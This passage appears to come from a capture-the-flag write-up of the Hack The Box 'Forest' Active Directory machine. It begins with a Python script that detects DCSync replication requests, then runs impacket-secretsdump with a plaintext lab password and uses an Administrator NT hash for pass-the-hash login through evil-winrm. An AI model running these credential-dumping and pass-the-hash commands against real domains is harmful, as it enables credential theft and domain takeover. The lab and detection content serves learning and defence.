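    {"id": 4662, "time": ts("2021-05-08 14:21:30"), "subject": "mhzcyber", "object_type": "domainDNS",
     "properties": {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}},
    # DC-to-DC replication by a machine account: expected, no alert.
    {"id": 4662, "time": ts("2021-05-08 14:25:00"), "subject": "FOREST$", "object_type": "domainDNS",
     "properties": {DS_REPLICATION_GET_CHANGES_ALL}},
    # Directory access without replication rights: not DCSync.
    {"id": 4662, "time": ts("2021-05-08 14:26:00"), "subject": "sebastien", "object_type": "user",
     "properties": {NOT_REPLICATION}},
]


def is_machine_account(name):
    return name.endswith("$")


def detect_dcsync(events, allowed_accounts=()):
    """Alerts for 4662 events requesting replication rights from principals that are
    neither machine accounts nor allow-listed (e.g. a known directory sync account)."""
    allowed = {a.lower() for a in allowed_accounts}
    created_at = {e["target"].lower(): e["time"] for e in events if e["id"] == 4720}
    group_adds = {e["target"].lower() for e in events
                  if e["id"] in (4728, 4756) and e.get("group", "").lower() in WATCHED_GROUPS}
    alerts = []
    for e in events:
        if e["id"] != 4662 or not (e["properties"] & REPLICATION_GUIDS):
            continue
        who = e["subject"]
        if is_machine_account(who) or who.lower() in allowed:
            continue
        reasons = ["replication rights requested by a non-DC principal"]
        created = created_at.get(who.lower())
        if created is not None and timedelta(0) <= e["time"] - created <= NEW_ACCOUNT_WINDOW:
            age = int((e["time"] - created).total_seconds())
            reasons.append(f"account created {age} s before the request")
        if who.lower() in group_adds:
            reasons.append("account was added to a watched Exchange group")
        alerts.append({
            "subject": who,
            "time": e["time"],
            "severity": "critical" if len(reasons) > 1 else "high",
            "reasons": reasons,
        })
    return alerts


if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS):
        print(a["severity"], a["subject"], a["time"], "; ".join(a["reasons"]))
```

The allow-list exists because some legitimate non-DC principals (directory synchronisation services) hold these rights; everything else requesting them deserves a ticket.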

impacket-secretsdump htb.local/mhzcyber:PlzhackIT@10.10.10.161
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up...

We have the hashes, so there are several things we can do now. The easiest and fastest is PtH, or Pass the Hash, which is simply sending the hash instead of the password. I'll use evil-winrm like we did before, but this time without a password:

evil-winrm -i 10.10.10.161 -u 'Administrator' -H 32693b11e6aa90eb43d32c72a07ceea6

Anyway, that's it. A few of the techniques mentioned here I'd like to come back to and explain in more depth, just for fun. Overall it was easy, nothing hard. I'm sure you know how to go grab the flag yourself.

Happy Hacking

MHZ-Cyber